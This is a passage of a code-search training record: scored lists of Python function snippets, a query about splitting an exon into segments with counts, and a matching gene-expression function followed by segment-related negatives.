AbilityId.TERRANBUILD_GHOSTACADEMY,\n AbilityId.TERRANBUILD_MISSILETURRET,\n AbilityId.TERRANBUILD_REFINERY,\n AbilityId.TERRANBUILD_SENSORTOWER,\n AbilityId.TERRANBUILD_STARPORT,\n AbilityId.TERRANBUILD_SUPPLYDEPOT,\n }", "def is_ivi_instrument(self): \n \n return False", "def is_on(a, b, c):\r\n return(isCollinear(a, b, c) and (within(a[0], c[0], b[0]) if a[0] != b[0] else\r\n within(a[1], c[1], b[1])))", "def is_id(self):\n found = False\n for p in self.ant:\n for prop in self.con:\n if p == prop:\n found = True\n return found", "def atPodium(self, sparseOK=False, one_mOK=False):\n pos = self.getPos()\n ok = (pos == self.GANG_ON_PODIUM) or (pos == self.GANG_AT_DENSE)\n if sparseOK:\n ok = ok or (pos == self.GANG_AT_SPARSE)\n if one_mOK:\n ok = ok or (pos == self.GANG_AT_1M)\n\n return ok", "def is_adjecent(self, cell1, cell2):\r\n if cell1 == cell2:\r\n return True\r\n elif cell1[0] == cell2[0] and (cell1[1] - cell2[1] == 1 or cell1[1] - cell2[1] == -1):\r\n return True\r\n elif cell1[1] == cell2[1] and (cell1[0] - cell2[0] == 1 or cell1[0] - cell2[0] == -1):\r\n return True\r\n else:\r\n return False", "def has_IP_property(self):\n origin = C_Polyhedron(point(0*Variable(self.space_dimension())))\n is_included = Poly_Con_Relation.is_included()\n saturates = Poly_Con_Relation.saturates()\n for c in self.constraints():\n rel = origin.relation_with(c)\n if (not rel.implies(is_included)) or rel.implies(saturates):\n return False\n return True", "def isSingleContinuum(vis, spw='', source='', intent='OBSERVE_TARGET', \n verbose=False, mymsmd=None):\n if vis=='': return False\n if type(vis) == list or type(vis) == np.ndarray:\n vis = vis[0]\n else:\n vis = vis.split(',')[0]\n if not os.path.exists(vis): return False\n needToClose = False\n if spw=='':\n if mymsmd is None:\n needToClose = True\n mymsmd = createCasaTool(msmdtool)\n mymsmd.open(vis)\n spw = getScienceSpws(vis, returnString=False, mymsmd=mymsmd)[0]\n info = transition(vis, spw, source, intent, verbose, mymsmd)\n if needToClose:\n mymsmd.close()\n if len(info) > 0:\n if info[0].find('Single_Continuum') >= 0:\n casalogPost(\"Identified spectral setup as Single_Continuum from transition name.\")\n return True\n return False", "def is_ode_noad_link(self):\n if self.project_name in IDENTIFIERS:\n return True\n else:\n return False", "def is_tentative(self):\n return self.state == TrackState.Tentative", "def is_tentative(self):\n return self.state == TrackState.Tentative", "def is_percolates(self):\n return self._uf.connected(self._top_idx, self._bottom_idx)", "def is_opposite(self, c):\n if self.opposite() == c:\n return True\n return False", "def is_artificial(self):\n\t\treturn 0", "def is_infrastructure (self):\n return sum([1 for i in self.infras]) != 0", "def is_solved(self):\n i = 0\n for row in self._marker:\n for x in row:\n if x == \"*\":\n i += 1\n if i > 1:\n return False\n return True", "def _compute_is_terminal(self):\n # by default the episode will terminate when all samples are labelled\n done = LalEnv._compute_is_terminal(self)\n # it also terminates when self.n_horizon datapoints were labelled\n if np.size(self.indeces_known) == self.n_horizon:\n done = True\n return done", "def is_acd(self):\n return self._is_acd" ]
[ "0.59894097", "0.5898949", "0.5672679", "0.5648508", "0.5560285", "0.5529773", "0.5459054", "0.54222125", "0.541582", "0.5374678", "0.53390956", "0.53365326", "0.53323716", "0.5328659", "0.52947295", "0.5285229", "0.5278996", "0.5277022", "0.5254552", "0.5249883", "0.5224548", "0.5172241", "0.51571554", "0.51529014", "0.51498073", "0.51232773", "0.5117219", "0.51109296", "0.51006824", "0.50965166", "0.50887454", "0.5067767", "0.5040452", "0.5039524", "0.50337976", "0.5030976", "0.50292283", "0.50271887", "0.50238866", "0.5020497", "0.5017914", "0.5017914", "0.5017494", "0.50029325", "0.49869883", "0.49846938", "0.4980708", "0.49801496", "0.49801496", "0.49801496", "0.49714917", "0.496559", "0.4952293", "0.49238014", "0.49219766", "0.49167034", "0.48957372", "0.48822367", "0.48809528", "0.48592177", "0.48476207", "0.48427665", "0.48372015", "0.48307538", "0.4815521", "0.48132563", "0.48126984", "0.48110467", "0.48075372", "0.48067978", "0.48065674", "0.47995389", "0.47921628", "0.4786523", "0.47815177", "0.47801805", "0.47800982", "0.47627783", "0.4762214", "0.47596583", "0.4757703", "0.47546405", "0.47527802", "0.47474748", "0.47467253", "0.47456646", "0.47451025", "0.47447938", "0.4742888", "0.47373432", "0.47297648", "0.4724309", "0.4724309", "0.4719934", "0.47154573", "0.47133207", "0.4705824", "0.47057992", "0.46981195", "0.4697781" ]
0.6469092
0
Split the exon into segments and get the corresponding counts.
def get_exon_expr(gene, vstart, vstop, countinfo, Idx, seg_counts): out_shape = (seg_counts.shape[1] + 1) if len(seg_counts.shape) > 1 else 2 # Todo: deal with absense of count file if vstart is np.nan or vstop is np.nan: # isolated exon case return np.zeros((0, out_shape), dtype='float') if countinfo is None or Idx.sample is None: return np.zeros((0, out_shape), dtype='float') #[np.nan] segments = gene.segmentgraph.segments sv1_id = bisect.bisect(segments[0], vstart) - 1 sv2_id = bisect.bisect(segments[0], vstop) - 1 if sv1_id == sv2_id: if len(seg_counts.shape) > 1: expr_list = np.c_[np.array([vstop - vstart]), [seg_counts[sv1_id, :]]] else: expr_list = np.array([(vstop - vstart, seg_counts[sv1_id])]) else: if len(seg_counts.shape) > 1: expr_list = np.c_[segments[1, sv1_id:sv2_id + 1] - segments[0, sv1_id:sv2_id + 1], seg_counts[sv1_id:sv2_id + 1, :]] else: expr_list = np.c_[segments[1, sv1_id:sv2_id + 1] - segments[0, sv1_id:sv2_id + 1], seg_counts[sv1_id:sv2_id + 1, np.newaxis]] expr_list[0, 0] -= (vstart - segments[0, sv1_id]) expr_list[-1, 0] -= (segments[1, sv2_id] - vstop) if gene.strand == '-': # need to reverse epression list to match the order of translation expr_list = expr_list[::-1] return expr_list
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def getSegmentCount(self) -> int:\n ...", "def calculate_number_of_segments(self):\n return sum(len(eg.transcript_file.segments) for eg in self.exemplars)", "def getSegments(self) -> List[int]:\n ...", "def Test_NumSegments(Daten):\n N_Leitungen = len(Daten.PipeSegments)\n\n return N_Leitungen", "def splitCount(self):\n return 0", "def count_segments(markers) -> int:\n cnt = Counter()\n for row in markers:\n cnt.update(row)\n n_cnt = dict(takewhile(lambda x: x[1] >= 10, cnt.most_common()))\n del n_cnt[1]\n del n_cnt[-1]\n return len(n_cnt.keys())", "def outputSegmentStat(self, param_combo2array_id2no_of_segments):\n\t\tparam_combo_ls = param_combo2array_id2no_of_segments.keys()\n\t\tparam_combo_ls.sort()\n\t\tfor param_combo in param_combo_ls:\n\t\t\tarray_id2no_of_segments = param_combo2array_id2no_of_segments.get(param_combo)\n\t\t\tno_of_arrays = len(array_id2no_of_segments)\n\t\t\tno_of_segments_ls = array_id2no_of_segments.values()\n\t\t\tno_of_segments_per_array = sum(no_of_segments_ls)/float(no_of_arrays)\n\t\t\tsys.stderr.write(\"Param-combo (a, T, M) %s: %s segments per array.\\n\"%(repr(param_combo), no_of_segments_per_array))", "def test_getting_segments(self):\n pass", "def segment(data):", "def get_num_chunks(self) -> int:", "def get_segments(file_name):\n count = 1\n total_num_lines = num_lines_in_file(file_name)\n with open(file_name, 'r') as file_in:\n pre_segment = file_in.readline().split()[0]\n segments = [pre_segment]\n num_lines = []\n for line in file_in:\n line = line.split()\n if line[0].startswith(';;'):\n count += 1\n else:\n if len(line) >= LINE_LEN:\n if line[0] == pre_segment:\n count += 1\n else:\n segments.append(line[0])\n pre_segment = line[0]\n num_lines.append(count)\n count = 1\n else:\n count += 1\n last_num_lines_entry = total_num_lines - sum(num_lines)\n num_lines.append(last_num_lines_entry)\n assert len(segments) == len(num_lines), \"%i != %i\" %(len(segments), len(num_lines))\n return segments, num_lines", "def numSegments(self):\n\n return self.getHierView().numSegments()", "def total_segments(self):\n return self._total_segments", "def get_number_of_segments(self):\n\n return len(self._break_points) - 1", "def segment_n(self):\n return len(self.segment_lengths)", "def segment_counter(self):\n return self._data_writer.get_segment_counter()", "def segments(self):\n return self._segments", "def partition_Basic(segfile):\n scenelist = Recording.read_segs(segfile)\n segcount = 0\n for l in scenelist.values():\n segcount += len(l)\n return scenelist, segcount", "def _convert_to_multi_segment(self):\n\n self.header['nb_segment'] = [self.info['n_episodes']]\n\n # drop repeated signal headers\n self.header['signal_channels'] = \\\n self.header['signal_channels'].reshape(\n self.info['n_episodes'], -1)[0]\n\n # reshape signal memmap list\n new_sig_memmaps = []\n n_channels = len(self.header['signal_channels'])\n sig_memmaps = self._raw_signals[0]\n for first_index in np.arange(0, len(sig_memmaps), n_channels):\n new_sig_memmaps.append(\n sig_memmaps[first_index:first_index + n_channels])\n self._raw_signals = new_sig_memmaps\n\n self.logger.debug('New number of segments: {}'.format(\n self.info['n_episodes']))\n\n return", "def total_chunks(self) -> global___Expression:", "def count_segments_naive(self, starts, ends, points):\r\n count = [0] * len(points)\r\n \r\n for i in range(len(points)):\r\n for j in range(len(starts)):\r\n if starts[j] <= points[i] <= ends[j]:\r\n count[i] += 1\r\n \r\n return count", "def _ions(self, f):\n outside_pos = f.tell()\n doff = find_offset(f, 4 * b'\\xff' + 'HapsSearch'.encode('ascii'))\n # actual end of prev section is 34 bytes before, but assume 1 rec\n f.seek(doff - 62)\n # seek backwards to find the FFFFFFFF header\n while True:\n f.seek(f.tell() - 8)\n if f.read(4) == 4 * b'\\xff':\n break\n f.seek(f.tell() + 64)\n nsegments = struct.unpack('<I', f.read(4))[0]\n for _ in range(nsegments):\n # first 32 bytes are segment name, rest are something else?\n f.seek(f.tell() + 96)\n nions = struct.unpack('<I', f.read(4))[0]\n ions = []\n for _ in range(nions):\n # TODO: check that itype is actually a SIM/full scan switch\n i1, i2, _, _, _, _, itype, _ = struct.unpack('<' + 8 * 'I',\n f.read(32))\n if itype == 0: # SIM\n ions.append(i1 / 100.)\n else: # full scan\n # TODO: this might be a little hacky?\n # ideally we would need to know n for this, e.g.:\n # ions += np.linspace(i1 / 100, i2 / 100, n).tolist()\n ions += np.arange(i1 / 100., i2 / 100. + 1, 1).tolist()\n # save the file position and load the position\n # that we were at before we started this code\n inside_pos = f.tell()\n f.seek(outside_pos)\n yield ions\n outside_pos = f.tell()\n f.seek(inside_pos)\n f.seek(outside_pos)", "def split_counts(self) -> Dict[int, int]:\n if self._split_counts is None:\n self.RefreshStats()\n return self._split_counts", "def sort_and_count_segments(self, starts, ends, points):\r\n \r\n # Cons: needs lot of memeory space\r\n lst = []\r\n for i in range(len(starts)): \r\n lst.append(range(starts[i], ends[i]+1))\r\n \r\n # store all the items in list\r\n lst_2 = []\r\n for sublist in lst:\r\n for item in sublist:\r\n lst_2.append(item)\r\n \r\n sorted_lst_2 = sorted(lst_2) # get sorted list\r\n \r\n count = [0] * len(points)\r\n \r\n # find item via binary search and count the occuranace of the item.\r\n for i in range(len(points)):\r\n if self.binary_search_for_count_segments(sorted_lst_2, points[i]) == points[i]:\r\n count[i] += sorted_lst_2.count(points[i])\r\n \r\n return count", "def _get_out_segments(self):\n return self.__out_segments", "def Segments():\n for n in range(ida_segment.get_segm_qty()):\n seg = ida_segment.getnseg(n)\n if seg:\n yield seg.start_ea", "def iter_segments(self):\n return\n yield", "def count_segments(s):\n s = s.strip().split()\n return len(s)", "def count(self) -> Tuple[groupable, pdarray]:\n repMsg = generic_msg(\n cmd=\"countReduction\",\n args={\"segments\": cast(pdarray, self.segments), \"size\": self.length},\n )\n self.logger.debug(repMsg)\n return self.unique_keys, create_pdarray(repMsg)", "def _count_chunks(matches):\n i = 0\n chunks = 1\n while (i < len(matches) - 1):\n if (matches[i + 1][0] == matches[i][0] + 1) and (matches[i + 1][1] == matches[i][1] + 1):\n i += 1\n continue\n i += 1\n chunks += 1\n return chunks", "def count_segments(self, raw_only: bool = False) -> int:\n if self.segments:\n self_count = 0 if raw_only else 1\n return self_count + sum(\n seg.count_segments(raw_only=raw_only) for seg in self.segments\n )\n else:\n return 1", "def segments(self):\n return (self._subset((i,i+1)) for i in range(len(self)-1))", "def __len__(self):\n return len(self.segments)", "def getChunks():", "def split_count(self) -> int:\n return int(self.graph_tuple_stats.split_count or 0)", "def get_all_segments(edfFiles):\n\n segments = []\n preprocessor = Preprocessor(config_startShift,\n config_endShift,\n config_powerLineFreq,\n config_bandLowCut,\n config_bandHighCut)\n for edf in edfFiles:\n print(\"getting the labeled segments from the recording \", str(edf.filename))\n segments.extend(get_segments_from_edf(edf, preprocessor))\n if edfFiles.index(edf) == 20: break\n return segments", "def getSegments(points):\n return _identifyStrokes(points)[1]", "def get_segment_index(datadb):\n #match in time!!!!\n if cfg.use_saliency:\n segment_index_tar = util.get_time_for_visual(datadb)\n segment_index_tar_future = OrderedDict()\n for key in segment_index_tar.keys():\n segment_index_tar_future[key] = np.array(segment_index_tar[key])+max_encoder_seq_length\n return segment_index_tar,segment_index_tar_future", "def get_n_splits(\n self,\n X: DataFrame,\n sections: Union[str, List[str]],\n y: Optional[Union[Series, ndarray]] = None,\n groups: Optional[Union[Series, ndarray]] = None,\n ) -> int:\n return X.groupby(sections).count().index.shape[0] * self.n_splits", "async def get_segment_count(lang: str):\n try:\n collection = get_collection(lang)\n return {\"count\": collection.count()}\n except KeyError as error:\n return error", "def _get_ngrams(segments, order):\n ngram_counts = collections.Counter()\n for seg in segments:\n for i in range(0, len(seg) - order + 1):\n ngram = tuple(seg[i:i+order])\n ngram_counts[ngram] += 1\n return ngram_counts", "def testViewOccData(self):\n try:\n entryD = self.__mU.doImport(self.__instanceSavePath, fmt=\"pickle\")\n segmentCountList = []\n segmentLengthList = []\n entryCountD = {}\n for entryId in entryD:\n for _, eD in entryD[entryId][\"selected_polymer_entities\"].items():\n\n analD = eD[\"anal_instances\"] if \"anal_instances\" in eD else {}\n\n for _, aD in analD.items():\n entryCountD[entryId] = True\n segmentCount = len(aD[\"owabRegiond\"])\n segmentLengths = [d[\"length\"] for sId, d in aD[\"owabRegiond\"].items()]\n\n segmentCountList.append(segmentCount)\n segmentLengthList.extend(segmentLengths)\n #\n logger.info(\"gaps %d gap lengths %d\", len(segmentCountList), len(segmentLengthList))\n #\n cu = DisorderChartUtils()\n cu.doIntegerBarChart(\n segmentCountList,\n plotPath=self.__plotOwabSegmentCount,\n yPlotScale=\"log\",\n yPlotMax=6,\n xPlotMax=100,\n xPlotLabel=\"Segment Count\",\n yPlotLabel=\"Protein Instances (log)\",\n plotTitle=\"Segment counts (OWAB > 2 * mean OWAB)\",\n )\n self.__writeLegend(\n self.__plotOwabSegmentCount,\n \"Segment counts for all (%d) protein sequences (OWAB > 2 * mean OWAB and X-ray resolution limit < 3.5 Angstoms (entries=%d)) \"\n % (len(segmentCountList), len(entryCountD)),\n )\n cu.doIntegerBarChart(\n segmentLengthList,\n plotPath=self.__plotOwabSegmentLength,\n yPlotScale=\"log\",\n yPlotMax=6,\n xPlotMax=100,\n xPlotLabel=\"Segment width (residues)\",\n yPlotLabel=\"Segment Instances (log)\",\n plotTitle=\"Segment widths (OWAB > 2 * mean OWAB)\",\n )\n self.__writeLegend(\n self.__plotOwabSegmentLength,\n \"Segment widths for all (%d) protein sequences (OWAB > 2 * mean OWAB and X-ray resolution limit < 3.5 Angstoms (entries=%d)) \"\n % (len(segmentLengthList), len(entryCountD)),\n )\n except Exception as e:\n logger.exception(\"Failing with %s\", str(e))\n self.fail()", "def energy_calc(signal: np.array, segment_length: int) -> np.array:\n energy = []\n for i in range(int(len(signal)/segment_length)):\n segment = signal[i*segment_length:(i+1)*segment_length]# try except error ...\n energy.append(np.sum(np.square(segment)) / segment_length)\n if energy[-1] < 0:\n print(i)\n return energy", "def _convert_to_counts(self, indiv_data):\n count_data = {}\n for indiv in indiv_data:\n for allele in indiv:\n if allele is not None:\n allele_count = count_data.get(str(allele), 0)\n count_data[str(allele)] = allele_count + 1\n return count_data", "def countDataSize(self,filename):\n \n try:\n d = h5py.File(filename,'r')\n except:\n print(filename)\n return \n\n N = 0\n scan_edges = d['level2/Statistics/scan_edges'][:]\n for (start,end) in scan_edges:\n N += (end-start)//self.offsetLen * self.offsetLen\n d.close()\n\n N = N*self.Nfeeds\n\n self.chunks += [[int(self.Nsamples), int(self.Nsamples+N)]]\n self.datasizes += [int(N/self.Nfeeds)]\n self.Nsamples += int(N)", "def segmentation_split(Y, X, Ls, n_sampels): \n n_seg = int(n_sampels/Ls) # Number of segments\n X = X.T[:n_seg*Ls] # remove last segement if too small\n Y = Y.T[:n_seg*Ls]\n \n Ys = np.split(Y.T, n_seg, axis=1) # Matrices with segments in axis=0\n Xs = np.split(X.T, n_seg, axis=1) # Matrices with segments in axis=0\n \n return Ys, Xs, n_seg", "def extract_segments(results):\n tt = [ ( parse_date(x[\"t1\"]), parse_date(x[\"t2\"]) ) for x in results[\"labels\"]+results[\"detected\"] ]\n ts = sorted(itertools.chain.from_iterable( tt ))\n t1 = parse_date(results[\"t1\"])\n if t1 < ts[0]:\n ts.insert(0, t1)\n t2 = parse_date(results[\"t2\"])\n if t2 > ts[-1]:\n ts.append(t2)\n return [ dict(t1=x[0].isoformat(), t2=x[1].isoformat()) for x in list(sliding_window(ts, 2)) ]", "def get_n_splits(self):\n pass", "def sections(self) -> int:\n return len(self.string.split(\".\"))", "def countsubcatchments(inputfilename=FileSettings.settingsdict['inputfilename']):\r\n global count\r\n with open(inputfilename, 'r') as swmmput:\r\n contents = swmmput.readlines()\r\n count = len(contents)\r\n return(count)", "def _chunklines(self):\r\n text = self.textwnd.toPlainText()\r\n lines_in_chunk = len(text.split(\"\\n\"))\r\n logger.debug(\"Lines in chunk: {}\".format(lines_in_chunk))\r\n return lines_in_chunk", "def SentenceSplitsStops(f):\n\tcounter=0\n\twith open(filename) as f:\n\t\tread = csv.reader(f)\n\t\tfor row in read:\n\t\t\t#Original\n\t\t\tzin0=row[0]\n\t\t\t#Human Translation\n\t\t\tzin1=row[1]\n\t\t\t#Machine Translation\n\t\t\tzin2=row[2]\n\t\t\tcounter+=1\n\t\t\t#FULL STOPS\n\t\t\t#print(abs((zin0.count('.') - zin1.count('.'))))\n\t\t\tprint(abs((zin0.count('.') - zin2.count('.'))))", "def get_number_of_measurement(self):\n used_fragments = set()\n counter = 0\n for fragment in self.observed_fragments:\n num_of_isotope = 0\n used_counter = 0\n for i in self.mdv[fragment]:\n num_of_isotope = num_of_isotope + 1\n if self.mdv[fragment][i]['use'] == 'use':\n\n counter = counter + 1\n used_counter = used_counter + 1\n if num_of_isotope == used_counter:\n used_fragments.add(fragment)\n return counter-len(used_fragments)", "def getSplitSize(self, split, ofwhat='sentences'):\n if ofwhat == 'sentences':\n return sum(len(img['sentences']) for img in self.split[split])\n else: # assume images\n return len(self.split[split])", "def _calculate_chunk_offsets(self):\n offset = 0\n offsets = []\n for chunk in self.data.iterchunks():\n offsets.append(offset)\n offset += len(chunk)\n return np.array(offsets)", "def countDataSize(self,filename):\n \n d = h5py.File(filename,'r')\n features = d['spectrometer/features'][:]\n select = self.selectData(features.astype(float), self.ifeature, d)\n N = len(features[select])\n d.close()\n\n N = (N//self.offsetLen) * self.offsetLen\n\n N = N*self.Nfeeds\n\n self.chunks += [[int(self.Nsamples), int(self.Nsamples+N)]]\n self.datasizes += [int(N/self.Nfeeds)]\n self.Nsamples += int(N)", "def count():", "def get_segments(self):\n\t\tos.chdir(self.segment_path)\n\t\tfor path in glob.glob(\"%s/*.seg\" % self.segment_path):\n\t\t\t_file = os.path.split(path)[1]\n\t\t\tdae = DiscreetArchiveElement(self,_file,element_type='segment')\n\t\t\tself.elements.append(dae)\n\t\treturn True", "def test_getting_segment_details(self):\n pass", "def get_segments(input_path):\n with open(input_path, 'r') as segments_file:\n segments = []\n for line in segments_file:\n words = line.split('\\t')\n sg_dict = {}\n sg_dict['start'] = float(words[0].replace(',', '.'))\n sg_dict['end'] = float(words[1].replace(',', '.'))\n sg_dict['class'] = words[2][:-1]\n segments.append(sg_dict)\n return segments", "def handle_splits(self, splits):\n total_leftover_cash = 0\n\n for instrument, ratio in splits:\n if instrument in self.positions:\n self._dirty_stats = True\n\n # Make the position object handle the split. It returns the\n # leftover cash from a fractional share, if there is any.\n position = self.positions[instrument]\n leftover_cash = position.handle_split(instrument, ratio)\n total_leftover_cash += leftover_cash\n\n return total_leftover_cash", "def _n_outer(econf):\n n_tot, ns, np, nd, nf = 0, 0, 0, 0, 0\n for shell in econf.split(' ')[1:]:\n n_shell = 0\n if shell[-1].isalpha():\n n_shell = 1\n elif len(shell) == 3:\n n_shell = int(shell[-1])\n elif len(shell) == 4:\n n_shell = int(shell[-2:])\n n_tot += n_shell\n if 's' in shell:\n ns += n_shell\n elif 'p' in shell:\n np += n_shell\n elif 'd' in shell:\n nd += n_shell\n elif 'f' in shell:\n nf += n_shell\n return n_tot, ns, np, nd, nf", "def get_segments(cst):\n assert isinstance(cst, ChromStruct)\n\n # create a set of coordinates for the start and end of segments\n segs = np.load(cst.sg_files)['sg']\n end = np.cumsum(segs)\n start = np.concatenate(([0], end[:-1]))\n\n return np.column_stack((start, end)).astype(int)", "def parse_segments(self):\n segs = self.unixtext.split(\"$$\")\n for seg in segs:\n self.segments.append(TextProductSegment(seg, self))", "def split(self, X):", "def getSegments(self):\n l = len(self.points)\n return [Segment(self.points[i % l], self.points[(i + 1) % l], \\\n color=self.side_color, width=self.side_width) for i in range(l)]", "def _setup_splits(self):\n #ntot = self.reredux_conf['nperfile']\n ntot = self.reredux_conf['Ngals']\n npersplit = self.runconf['nper']\n\n self.beglist, self.endlist = get_splits(ntot, npersplit)", "def _get_observation_count(self):\n observation_count = 0\n for sequence in self.seq_list:\n observation_count += sequence.shape[0] \n \n return observation_count", "def street_segment_count(Gu):\n if nx.is_directed(Gu): # pragma: no cover\n msg = \"`Gu` must be undirected\"\n raise ValueError(msg)\n return len(Gu.edges)", "def oversegmentation_statistics(seg, n_bins):\n\n def extract_segs_in_slice(z):\n # 2d blocking representing the patches\n seg_z = seg[:,:,z]\n return np.unique(seg_z).shape[0]\n\n # parallel\n with futures.ThreadPoolExecutor(max_workers=8) as executor:\n tasks = []\n for z in xrange(seg.shape[2]):\n tasks.append(executor.submit(extract_segs_in_slice, z))\n segs_per_slice = [fut.result() for fut in tasks]\n\n # calculate histogram to have a closer look at the stats\n histo, bin_edges = np.histogram(segs_per_slice, bins = n_bins)\n # we only need the bin_edges\n return bin_edges", "def segmenter(data_stream: numpy.ndarray) -> Sequence[int]:\n diff = numpy.median(\n numpy.convolve(\n numpy.abs(numpy.diff(data_stream)), numpy.array([1, 1, 1, 1, 1]) / 5\n )\n )\n return cast(\n Sequence[int],\n numpy.where(\n numpy.abs(numpy.diff(data_stream, prepend=data_stream[0])) > diff * 5\n )[0],\n )", "def get_segments(self, start=False):\n cmd = [\"ipcs\", \"-a\"]\n process = subprocess.Popen(cmd, stdout=subprocess.PIPE)\n output, err = process.communicate()\n output = output.decode(\"utf-8\").split(\"\\n\")\n\n keys = ['key', 'shmid', 'owner', 'perms', 'bytes', 'nattch',\n 'status']\n segments = {}\n\n for line in output:\n # this should capture all keys\n # note: it won't do queues vs mem vs sem etc.\n if line[0:2] == '0x':\n values = list(filter(None, line.split(\" \")))\n data = dict(zip(keys, values))\n if start:\n # print (data['shmid'])\n self.segments[data['shmid']] = data\n segments[data['shmid']] = data\n return segments", "def summarizePosition(self, index):\n countAtPosition = Counter()\n excludedCount = 0\n\n for read in self:\n try:\n countAtPosition[read.sequence[index]] += 1\n except IndexError:\n excludedCount += 1\n\n return {\n 'excludedCount': excludedCount,\n 'countAtPosition': countAtPosition\n }", "def _get_end_points(self, segmented_instances, i, stats, idx):\n\n end_points=[]\n\n # find all points intersecting the bbox\n #(tl_x, th_y, width, height, area)\n label_num=i+1\n leftmost_x = stats['bbox'][i][cv2.CC_STAT_LEFT]\n topmost_y = stats['bbox'][i][cv2.CC_STAT_TOP]\n width = stats['bbox'][i][cv2.CC_STAT_WIDTH]\n height = stats['bbox'][i][cv2.CC_STAT_HEIGHT]\n bottom_most_y = topmost_y + height-1\n right_most_x = leftmost_x + width-1\n\n segmented_instances_copy=segmented_instances.copy()\n edge_points = np.zeros(segmented_instances.shape).astype(np.uint8)\n segs = np.zeros(segmented_instances.shape).astype(np.uint8)\n segs[segmented_instances==label_num]=255\n cv2.rectangle(segmented_instances_copy,(leftmost_x, topmost_y), (right_most_x, bottom_most_y), 150, 2)\n\n #Get all points for the current stem segment\n label_points = np.argwhere(segmented_instances.copy()==label_num)\n\n # upper points from (tl_x,th_y) to (th_x, th_y) that instersect with the upper edge of the bouding box\n upper_points = [i for i in label_points if i[0]==topmost_y and i[1]>=leftmost_x and i[1]<=right_most_x]\n x_pts, segs, edge_points = self._update_imgs_and_pt_list(upper_points, edge_points, segs, 1)\n center_upper_pts = sorted(self._get_centeroids(x_pts))\n\n # left side points from (tl_x, tl_y) to (tl_x, th_y) that instersect with the left edge of the bouding box\n left_points = [i for i in label_points if i[1]==leftmost_x and i[0]<=bottom_most_y and i[0]>=topmost_y]\n x_pts, segs, edge_points = self._update_imgs_and_pt_list(left_points, edge_points, segs, 0)\n center_left_pts = sorted(self._get_centeroids(x_pts))\n\n #right side points form (th_x, tl_y) to (th_x, th_y) that instersect with the right edge of the bouding box\n right_points = [i for i in label_points if i[1]==right_most_x and i[0]<=bottom_most_y and i[0]>=topmost_y]\n x_pts, segs, edge_points = self._update_imgs_and_pt_list(right_points, edge_points, segs, 0)\n center_right_pts = sorted(self._get_centeroids(x_pts))\n\n #bottom points from (tl_x, tl_y) to (th_x,tl_y)\n bottom_points = [i for i in label_points if i[1]>=leftmost_x and i[1]<=right_most_x and i[0]==bottom_most_y]\n x_pts, segs, edge_points = self._update_imgs_and_pt_list(bottom_points, edge_points, segs, 1)\n center_bottom_pts = sorted(self._get_centeroids(x_pts))\n\n # If there are corner edges, get the centroid of that\n center_x_lb, center_y_lb, center_left_pts, center_bottom_pts = self._get_corner_centers(center_left_pts, \\\n center_bottom_pts, bottom_most_y, leftmost_x)\n if (center_x_lb != None) and (center_y_lb != None):\n end_points.append([center_x_lb, center_y_lb])\n else:\n if len(center_left_pts)>0:\n for pt_idx in range(0, len(center_left_pts)):\n end_points.append([leftmost_x, center_left_pts[pt_idx]])\n if len(center_bottom_pts)>0:\n for pt_idx in range(0, len(center_bottom_pts)):\n end_points.append([center_bottom_pts[pt_idx], bottom_most_y])\n\n # If there are corner edges, get the centroid of that\n center_x_ur, center_y_ur, center_right_pts, center_upper_pts = self._get_corner_centers(center_right_pts, \\\n center_upper_pts, topmost_y, right_most_x)\n if (center_x_ur != None) and (center_y_ur != None):\n end_points.append([center_x_ur, center_y_ur])\n else:\n if len(center_right_pts)>0:\n for pt_idx in range(0, len(center_right_pts)):\n end_points.append([right_most_x, center_right_pts[pt_idx]])\n if len(center_upper_pts)>0:\n for pt_idx in range(0, len(center_upper_pts)):\n end_points.append([center_upper_pts[pt_idx], topmost_y])\n\n # If there are corner edges, get the centroid of that\n center_x_ul, center_y_ul, center_left_pts, center_upper_pts = self._get_corner_centers(center_left_pts, \\\n center_upper_pts, topmost_y, leftmost_x)\n if (center_x_ul != None) and (center_y_ul != None):\n end_points.append([center_x_ul, center_y_ul])\n else:\n if len(center_left_pts)>0:\n for pt_idx in range(0, len(center_left_pts)):\n end_points.append([leftmost_x, center_left_pts[pt_idx]])\n if len(center_upper_pts)>0:\n for pt_idx in range(0, len(center_upper_pts)):\n end_points.append([center_upper_pts[pt_idx], topmost_y])\n\n\n # If there are corner edges, get the centroid of that\n center_x_br, center_y_br, center_right_pts, center_bottom_pts = self._get_corner_centers(center_right_pts, \\\n center_bottom_pts, bottom_most_y, right_most_x)\n if (center_x_br != None) and (center_y_br != None):\n end_points.append([center_x_br, center_y_br])\n else:\n if len(center_right_pts)>0:\n for pt_idx in range(0, len(center_right_pts)):\n end_points.append([right_most_x, center_right_pts[pt_idx]])\n if len(center_bottom_pts)>0:\n for pt_idx in range(0, len(center_bottom_pts)):\n end_points.append([center_bottom_pts[pt_idx], bottom_most_y])\n\n #self.showme(segmented_instances_copy, 'bbox')\n\n return end_points", "def segment_lengths(self):\n if not hasattr(self, '_segment_lengths'):\n _ = self.length # Sets length and segment_lengths\n return self._segment_lengths", "def getTimeSegments(segments,bounds,radius,starttime,endtime,magrange,catalog,contributor):\n stime = starttime\n etime = endtime\n \n dt = etime - stime\n dtseconds = dt.days*86400 + dt.seconds\n #segment 1\n newstime = stime\n newetime = stime + timedelta(seconds=dtseconds/2)\n nevents,maxevents = getEventCount(bounds=bounds,radius=radius,starttime=newstime,endtime=newetime,\n magrange=magrange,catalog=catalog,contributor=contributor)\n if nevents < maxevents:\n segments.append((newstime,newetime))\n else:\n segments = getTimeSegments(segments,bounds,radius,newstime,newetime,\n magrange,catalog,contributor)\n #segment 2\n newstime = newetime\n newetime = etime\n nevents,maxevents = getEventCount(bounds=bounds,radius=radius,\n starttime=newstime,endtime=newetime,\n magrange=magrange,catalog=catalog,\n contributor=contributor)\n if nevents < maxevents:\n segments.append((newstime,newetime))\n else:\n segments = getTimeSegments(segments,bounds,radius,newstime,newetime,\n magrange,catalog,contributor)\n\n return segments", "def split_segment(self):\n # Selection management\n selected_segment = \\\n self.controller.shared_data.obj_track.selected_segment_idx\n\n if len(selected_segment) > 1:\n messagebox.showerror('Warning',\n 'More than one segment is selected')\n return\n elif len(selected_segment) == 0:\n messagebox.showerror('Warning',\n 'No segment is selected')\n return\n else:\n segment_idx = selected_segment[0]\n df_segment = \\\n self.controller.shared_data.obj_track.get_segment(segment_idx)\n\n # Create interactivity\n del self.split_segment_interaction\n self.split_segment_interaction = SplitSegmentCallback(\n self.controller.shared_data,\n df_segment)\n\n 